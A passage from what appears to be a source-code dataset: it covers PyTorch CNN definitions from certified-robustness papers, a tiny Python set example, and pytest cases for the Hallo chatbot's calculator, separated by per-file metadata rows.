nn.Conv2d(1, 4, 5, stride=2, padding=2),
nn.ReLU(),
nn.Conv2d(4, 8, 5, stride=2, padding=2),
nn.ReLU(),
Flatten(),
nn.Linear(8*7*7,128),
nn.ReLU(),
nn.Linear(128, 10)
)
class TradesCNN(nn.Module):
def __init__(self, drop=0.5):
super().__init__()
self.num_channels = 1
self.num_labels = 10
activ = nn.ReLU(True)
self.feature_extractor = nn.Sequential(OrderedDict([
('conv1', nn.Conv2d(self.num_channels, 32, 3)),
('relu1', activ),
('conv2', nn.Conv2d(32, 32, 3)),
('relu2', activ),
('maxpool1', nn.MaxPool2d(2, 2)),
('conv3', nn.Conv2d(32, 64, 3)),
('relu3', activ),
('conv4', nn.Conv2d(64, 64, 3)),
('relu4', activ),
('maxpool2', nn.MaxPool2d(2, 2)),
]))
self.classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(64 * 4 * 4, 200)),
('relu1', activ),
('drop', nn.Dropout(drop)),
('fc2', nn.Linear(200, 200)),
('relu2', activ),
('fc3', nn.Linear(200, self.num_labels)),
]))
for m in self.modules():
if isinstance(m, (nn.Conv2d)):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
nn.init.constant_(self.classifier.fc3.weight, 0)
nn.init.constant_(self.classifier.fc3.bias, 0)
def forward(self, input):
features = self.feature_extractor(input)
logits = self.classifier(features.view(-1, 64 * 4 * 4))
return logits
class TradesCNN_one_maxpool(nn.Module):
def __init__(self, drop=0.5):
super().__init__()
self.num_channels = 1
self.num_labels = 10
activ = nn.ReLU(True)
self.feature_extractor = nn.Sequential(OrderedDict([
('conv1', nn.Conv2d(self.num_channels, 32, 3)),
('relu1', activ),
('conv2', nn.Conv2d(32, 32, 3, stride=2)),
('relu2', activ),
('conv3', nn.Conv2d(32, 64, 3)),
('relu3', activ),
('conv4', nn.Conv2d(64, 64, 3)),
('relu4', activ),
('maxpool2', nn.MaxPool2d(2, 2)),
]))
self.classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(64 * 4 * 4, 200)),
('relu1', activ),
('drop', nn.Dropout(drop)),
('fc2', nn.Linear(200, 200)),
('relu2', activ),
('fc3', nn.Linear(200, self.num_labels)),
]))
for m in self.modules():
if isinstance(m, (nn.Conv2d)):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
nn.init.constant_(self.classifier.fc3.weight, 0)
nn.init.constant_(self.classifier.fc3.bias, 0)
def forward(self, input):
features = self.feature_extractor(input)
logits = self.classifier(features.view(-1, 64 * 4 * 4))
return logits
class TradesCNN_no_maxpool(nn.Module):
def __init__(self, drop=0.5):
super().__init__()
self.num_channels = 1
self.num_labels = 10
activ = nn.ReLU(True)
self.feature_extractor = nn.Sequential(OrderedDict([
('conv1', nn.Conv2d(self.num_channels, 32, 3)),
('relu1', activ),
('conv2', nn.Conv2d(32, 32, 3, stride=2)),
('relu2', activ),
('conv3', nn.Conv2d(32, 64, 3)),
('relu3', activ),
('conv4', nn.Conv2d(64, 64, 3, stride=2)),
('relu4', activ),
]))
self.classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(64 * 4 * 4, 200)),
('relu1', activ),
('drop', nn.Dropout(drop)),
('fc2', nn.Linear(200, 200)),
('relu2', activ),
('fc3', nn.Linear(200, self.num_labels)),
]))
for m in self.modules():
if isinstance(m, (nn.Conv2d)):
nn.init.kaiming_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
nn.init.constant_(self.classifier.fc3.weight, 0)
nn.init.constant_(self.classifier.fc3.bias, 0)
def forward(self, input):
features = self.feature_extractor(input)
logits = self.classifier(features.view(-1, 64 * 4 * 4))
return logits
############### Models from CROWN-IBP paper (Zhang et al. 2020) ###################
def crown_ibp_model_a_b(in_ch=3, in_dim=32, width=2, linear_size=256):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4),linear_size),
nn.ReLU(),
nn.Linear(linear_size, 10)
)
return model
def crown_ibp_model_c_d_e_f(in_ch=3, in_dim=32, kernel_size=3, width=2, linear_size=64):
if linear_size is None:
linear_size = width * 64
if kernel_size == 5:
h = (in_dim - 4) // 4
elif kernel_size == 3:
h = in_dim // 4
else:
raise ValueError("Unsupported kernel size")
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, kernel_size=kernel_size, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, kernel_size=kernel_size, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, kernel_size=4, stride=4, padding=0),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*h*h, linear_size),
nn.ReLU(),
nn.Linear(linear_size, 10)
)
return model
def crown_ibp_model_g_h_i_j(in_ch=3, in_dim=32, width=1, linear_size=256):
model = nn.Sequential(
nn.Conv2d(in_ch, 4*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 4*width, 4, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(4*width, 8*width, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(8*width, 8*width, 4, stride=2, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear(8*width*(in_dim // 4)*(in_dim // 4),linear_size),
nn.ReLU(),
nn.Linear(linear_size,linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
return model
def crown_ibp_dm_large(in_ch, in_dim, linear_size=512):
model = nn.Sequential(
nn.Conv2d(in_ch, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 64, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(64, 128, 3, stride=2, padding=1),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=1, padding=1),
nn.ReLU(),
nn.Conv2d(128, 128, 3, stride=1, padding=1),
nn.ReLU(),
Flatten(),
nn.Linear((in_dim//2) * (in_dim//2) * 128, linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
return model
############### Models from auto_LiRPA paper (Xu et al. 2020) ###################
def crown_ibp_dm_large_bn(in_ch=3, in_dim=32, width=64, linear_size=512):
"""The same as the DM-large model but with batch normalization layers."""
model = nn.Sequential(
nn.Conv2d(in_ch, width, 3, stride=1, padding=1),
nn.BatchNorm2d(width),
nn.ReLU(),
nn.Conv2d(width, width, 3, stride=1, padding=1),
nn.BatchNorm2d(width),
nn.ReLU(),
nn.Conv2d(width, 2 * width, 3, stride=2, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
nn.Conv2d(2 * width, 2 * width, 3, stride=1, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
nn.Conv2d(2 * width, 2 * width, 3, stride=1, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
Flatten(),
nn.Linear((in_dim//2) * (in_dim//2) * 2 * width, linear_size),
nn.ReLU(),
nn.Linear(linear_size,10)
)
return model
############# Models from IBP with short warmup (Shi et al. 2021) ####################
def crown_ibp_dm_large_bn_full(in_ch=3, in_dim=32, width=64, linear_size=512, num_class=10):
model = nn.Sequential(
nn.Conv2d(in_ch, width, 3, stride=1, padding=1),
nn.BatchNorm2d(width),
nn.ReLU(),
nn.Conv2d(width, width, 3, stride=1, padding=1),
nn.BatchNorm2d(width),
nn.ReLU(),
nn.Conv2d(width, 2 * width, 3, stride=2, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
nn.Conv2d(2 * width, 2 * width, 3, stride=1, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
nn.Conv2d(2 * width, 2 * width, 3, stride=1, padding=1),
nn.BatchNorm2d(2 * width),
nn.ReLU(),
Flatten(),
nn.Linear((in_dim//2) * (in_dim//2) * 2 * width, linear_size),
nn.BatchNorm1d(linear_size),
nn.ReLU(),
nn.Linear(linear_size,num_class)
)
return model
| 29.376409 | 101 | 0.522506 | 5,188 | 39,100 | 3.827101 | 0.054549 | 0.062554 | 0.070511 | 0.083203 | 0.855301 | 0.842609 | 0.82624 | 0.794208 | 0.770536 | 0.756535 | 0 | 0.086068 | 0.319514 | 39,100 | 1,330 | 102 | 29.398496 | 0.660165 | 0.053862 | 0 | 0.70696 | 0 | 0 | 0.012632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086996 | false | 0 | 0.00641 | 0.033883 | 0.18315 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
60fff778b1caf2182c4ab818d8ca823f7aa5674d | 32 | py | Python | PyCharm/Primer_12.py | tamaranesterenko/-Python.LR_10 | 57feefb1e33c64dbd9c46fe17cef9cf363c6d17b | [
"MIT"
] | null | null | null | PyCharm/Primer_12.py | tamaranesterenko/-Python.LR_10 | 57feefb1e33c64dbd9c46fe17cef9cf363c6d17b | [
"MIT"
] | null | null | null | PyCharm/Primer_12.py | tamaranesterenko/-Python.LR_10 | 57feefb1e33c64dbd9c46fe17cef9cf363c6d17b | [
"MIT"
] | null | null | null | a = {0, 1, 12, 3, 2}
print(a)
| 10.666667 | 21 | 0.40625 | 8 | 32 | 1.625 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 0.3125 | 32 | 2 | 22 | 16 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
880e233950b1dffb0f8ac1a363f56d46d14f086e | 29,947 | py | Python | hallo/test/modules/math/test_calculate.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2022-01-27T13:25:01.000Z | 2022-01-27T13:25:01.000Z | hallo/test/modules/math/test_calculate.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/test/modules/math/test_calculate.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | from hallo.events import EventMessage
def test_calc_simple(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2+2")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert data[0].text == "4", "2+2 != 4"
def test_calc_multiply(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 21*56")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert data[0].text == "1176", "21*56 != 1176"
def test_calc_divide(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 1/5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert data[0].text == "0.2", "1/5 != 0.2"
def test_calc_subtract(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 13-17")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert data[0].text == "-4", "13-17 != -4"
def test_calc_div_zero(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 1/0")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "division by zero should fail"
assert (
"no division by zero" in data[0].text
), "division by zero response did no specify problem"
def test_cos(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cos(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "cos(0) != 1"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cos(pi/2)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "cos(pi/2) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cos(pi)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -1 == float(data[0].text), "cos(pi) != -1"
def test_sin(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sin(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "sin(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sin(pi/2)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "sin(pi/2) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sin(pi)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "sin(pi) != 0"
def test_order_of_operations(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 6+7*8")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 62 == float(data[0].text), "6+7*8 != 62"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 16/8-2")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "16/8-2 != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 9-5/(8-3)*2+6")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 13 == float(data[0].text), "9-5/(8-3)*2+6 != 13"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 150/(6+3*8)-5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), " 150/(6+3*8)-5 != 0"
def test_brackets(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc (25-11)*3")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 42 == float(data[0].text), "(25-11)*3 != 42"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 4+(-1(-2-1))^2")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 13 == float(data[0].text), "4+(-1(-2-1))^2 != 13"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2(3+4)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 14 == float(data[0].text), "2(3+4) != 14"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc (3+4)3")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 21 == float(data[0].text), "(3+4)3 != 21"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc (((17*3)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "(((17*3) should fail"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc (21/3))+2))*5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "(21/3))+2))*5 should fail"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc ((15*(3))())")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "((15*(3))()) should fail"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc (3)-(7)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -4 == float(data[0].text), "(3)-(7) != -4"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc e(3+4)pi")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 59.778 == float(data[0].text[:6]), "e(3+4)pi != 59.778"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cos(acos(0.7))")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.7 == round(float(data[0].text), 5), "cos(acos(0.7)) != 0.7"
def test_pi(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc pi")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "3.141" == data[0].text[:5], "pi != 3.141"
def test_e(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc e")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "2.718" == data[0].text[:5], "e != 2.718"
def test_tan(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tan(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "tan(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tan(pi)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "tan(pi) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tan(pi/2)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 10 ** 6 < abs(float(data[0].text)), "abs(tan(pi/2)) < 1,000,000"
def test_acos(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acos(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "acos(1) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acos(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "1.570" == data[0].text[:5], "acos(0) != pi/2"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acos(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "3.141" == data[0].text[:5], "acos(-1) != pi"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acos(2)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text, "acos(2) should fail"
def test_asin(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asin(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "asin(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asin(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.5707 == float(data[0].text[:6]), "asin(1) != pi/2"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asin(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -1.5707 == float(data[0].text[:7]), "asin(-1) != -pi/2"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asin(2)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text, "asin(2) should fail"
def test_atan(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atan(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "atan(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atan(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.785 == float(data[0].text[:5]), "atan(1) != pi/4"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atan(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -0.785 == float(data[0].text[:6]), "atan(-1) != -pi/4"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc atan(1000000)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.5707 == float(data[0].text[:6]), "atan(1000000) != pi/2"
def test_sqrt(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sqrt(4)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 2 == float(data[0].text), "sqrt(4) != 2"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sqrt(2)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "1.414" == data[0].text[:5], "sqrt(2) != 1.414"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sqrt(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "sqrt(1) != 1"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sqrt(2.25)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.5 == float(data[0].text), "sqrt(2.25) != 1.5"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sqrt(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "negative root should fail"
def test_power(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2^2")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 4 == float(data[0].text), "2^2 != 4"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2**2")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 4 == float(data[0].text), "** should work alongside ^"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2^-1")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.5 == float(data[0].text), "2^-1 != 1/2"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2^0.5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.414 == float(data[0].text[:5]), "2^0.5 != 1.414"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc 2^0")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "2^0 != 1"
def test_hyperbolics(hallo_getter):
test_hallo = hallo_getter({"math"})
# Cosh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cosh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "cosh(0) != 1"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cosh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.543 == float(data[0].text[:5]), "cosh(1) != 1.543"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc cosh(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.543 == float(data[0].text[:5]), "cosh(-1) != 1.543"
# Sinh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sinh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "sinh(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sinh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1.175 == float(data[0].text[:5]), "sinh(1) != 1.175"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc sinh(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -1.175 == float(data[0].text[:6]), "sinh(-1) != -1.175"
# Tanh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tanh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "tanh(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tanh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.761 == float(data[0].text[:5]), "tanh(1) != 0.761"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tanh(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert -0.761 == float(data[0].text[:6]), "tanh(-1) != -0.761"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc tanh(1000000)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 1 == float(data[0].text), "tanh(1000000) != 1"
# Acosh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acosh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert "error" in data[0].text.lower(), "acosh(0) should fail"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acosh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "acosh(1) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc acosh(4)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 2.063 == float(data[0].text[:5]), "acosh(4) != 2.063"
# Asinh
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asinh(0)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0 == float(data[0].text), "asinh(0) != 0"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asinh(1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert 0.881 == float(data[0].text[:5]), "asinh(1) != 0.881"
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "calc asinh(-1)")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
